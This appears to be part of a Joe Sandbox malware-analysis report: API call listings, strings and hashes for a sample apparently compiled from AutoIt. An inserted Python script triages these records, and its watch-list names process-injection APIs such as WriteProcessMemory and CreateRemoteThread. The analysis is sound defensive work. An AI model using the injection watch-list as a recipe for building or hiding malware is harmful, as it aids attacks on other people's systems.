                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                    • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                    • _memset.LIBCMT ref: 00486FDD
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                    • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                    • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                    • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                    • VariantInit.OLEAUT32(?), ref: 00456C2A
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                    • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                    • VariantClear.OLEAUT32(?), ref: 00456CC6
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                    • VariantClear.OLEAUT32(?), ref: 00456CEE
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                    • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                    • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                    • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • CoInitialize.OLE32 ref: 00478403
                    • CoUninitialize.OLE32 ref: 0047840E
                    • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                    • IIDFromString.OLE32(?,?), ref: 004784E1
                    • VariantInit.OLEAUT32(?), ref: 0047857B
                    • VariantClear.OLEAUT32(?), ref: 004785DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                    • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                    • Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                    • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                    • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                    • gethostbyname.WSOCK32(?), ref: 004757E4
                    • IcmpCreateFile.IPHLPAPI ref: 004757F2
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                    • WSACleanup.WSOCK32 ref: 004758F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 88da4120b325bd232c2575f1f4021b78f4395f83c1e3df983bf90aa55158913f
                    • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                    • Opcode Fuzzy Hash: 88da4120b325bd232c2575f1f4021b78f4395f83c1e3df983bf90aa55158913f
                    • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
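The records on this page are the IDA plugin's per-function API listing for the sample, and a report of this size carries hundreds of them. Sorting them by the modules each function touches (network, COM, GUI, CRT) is faster than reading every block. The script below is an added example, not part of the Joe Sandbox report: it parses this record format (the `APIs` header, the `• Name.MODULE(args), ref: addr` call lines, the `Part of subcall function` prefix, and the `String ID` / `API String ID` metadata) and triages each function. The module-to-category table and the injection watch-list are the example's own choices, not a Joe Sandbox classification; the sample input is two records copied from this page.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' records (the format on this page) and
triage each function by the modules it imports.
Added example, not part of the Joe Sandbox report. MODULE_CATEGORY and
INJECTION_APIS are this example's own choices, not Joe Sandbox's."""
import re
from collections import Counter

# API line, e.g. '• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,...), ref: 00475862',
# '• _wcscpy.LIBCMT ref: 0046A9FF', or one with a 'Part of subcall function' prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[\w$@?]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
# Metadata line such as '• String ID: Ping'
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")

MODULE_CATEGORY = {
    "WSOCK32": "network", "WS2_32": "network", "IPHLPAPI": "network",
    "WININET": "network", "OLE32": "com", "OLEAUT32": "com",
    "USER32": "gui", "COMCTL32": "gui", "GDI32": "gui", "LIBCMT": "crt",
}
INJECTION_APIS = {  # flagged whatever the module
    "WriteProcessMemory", "VirtualAllocEx", "CreateRemoteThread",
    "NtMapViewOfSection", "SetThreadContext", "QueueUserAPC",
}


def parse_records(text):
    """Split plugin output into per-function records; 'APIs' starts each one."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "meta": {}, "strings": []}
            records.append(cur)
        elif cur is None or not line.startswith("•"):
            continue  # 'Strings', 'Similarity', 'Memory Dump Source' headers
        elif m := API_RE.match(line):
            cur["apis"].append({
                "name": m["name"], "module": m["module"],
                "args": [a for a in (m["args"] or "").split(",") if a],
                "ref": int(m["ref"], 16), "subcall": m["sub"] is not None,
            })
        elif m := KV_RE.match(line):
            val = m["val"].replace("Download File", "").strip()  # link residue
            cur["meta"][m["key"]] = val
            if m["key"] == "String ID":
                cur["strings"] = [s for s in val.split("$") if s]
    return records


def triage(record):
    """Category counts, watch-list hits and lowest call site for one function."""
    direct = [a for a in record["apis"] if not a["subcall"]]
    return {
        "first_ref": min((a["ref"] for a in direct), default=None),
        "categories": dict(Counter(
            MODULE_CATEGORY.get(a["module"], "other") for a in direct)),
        "watchlist": sorted({a["name"] for a in record["apis"]
                             if a["name"] in INJECTION_APIS}),
        "strings": record["strings"],
        "api_string_id": record["meta"].get("API String ID"),
    }


# Constructed sample: two records copied from this report (the COM helper with
# the 'Failed to create object' strings, and the Ping routine).
SAMPLE = """\
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• CoInitialize.OLE32 ref: 00478403
• CoUninitialize.OLE32 ref: 0047840E
• CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
• IIDFromString.OLE32(?,?), ref: 004784E1
• VariantInit.OLEAUT32(?), ref: 0047857B
• VariantClear.OLEAUT32(?), ref: 004785DC
Strings
Similarity
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00475793
• inet_addr.WSOCK32(?,?,?), ref: 004757D8
• gethostbyname.WSOCK32(?), ref: 004757E4
• IcmpCreateFile.IPHLPAPI ref: 004757F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
• WSACleanup.WSOCK32 ref: 004758F3
Strings
Similarity
• String ID: Ping
• API String ID: 1028309954-2246546115
"""

if __name__ == "__main__":
    for s in (triage(r) for r in parse_records(SAMPLE)):
        print(f"{s['first_ref']:08X} {s['categories']} strings={s['strings']}")
```

The `Ping` and `Failed to create object` strings are the AutoIt3 interpreter's own text (its `Ping()` function and `ObjCreate()` error messages), which agrees with the report's "Binary is likely a compiled AutoIt script file" signature. A pass like this therefore mostly separates interpreter boilerplate from the few functions worth reversing by hand; feed it the whole listing and sort by `watchlist` and `categories` rather than reading block by block.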
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                    • GetLastError.KERNEL32 ref: 0046B550
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                    • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                    • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                    • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                    • GetDlgCtrlID.USER32 ref: 0045901F
                    • GetParent.USER32 ref: 0045903B
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                    • GetDlgCtrlID.USER32(?), ref: 00459047
                    • GetParent.USER32(?), ref: 00459063
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                    • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                    • Opcode Fuzzy Hash: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                    • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                    • GetDlgCtrlID.USER32 ref: 00459108
                    • GetParent.USER32 ref: 00459124
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                    • GetDlgCtrlID.USER32(?), ref: 00459130
                    • GetParent.USER32(?), ref: 0045914C
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                    • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                    • Opcode Fuzzy Hash: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                    • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                    APIs
                    • GetParent.USER32 ref: 0045916F
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                    • _wcscmp.LIBCMT ref: 00459196
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                    • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                    • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                    • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 004611F0
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                    • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                    • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                    • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                    • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-2080382077
                    • Opcode ID: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                    • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                    • Opcode Fuzzy Hash: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                    • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                    APIs
                    • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                    • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                    • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                    • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                      • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                      • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                      • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                    • GetDC.USER32 ref: 0043CD32
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                    • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                    • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                    • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                    • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
